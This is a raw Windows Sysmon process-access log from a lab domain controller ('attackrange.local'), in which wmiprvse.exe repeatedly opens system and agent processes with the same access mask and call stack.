16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.206{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 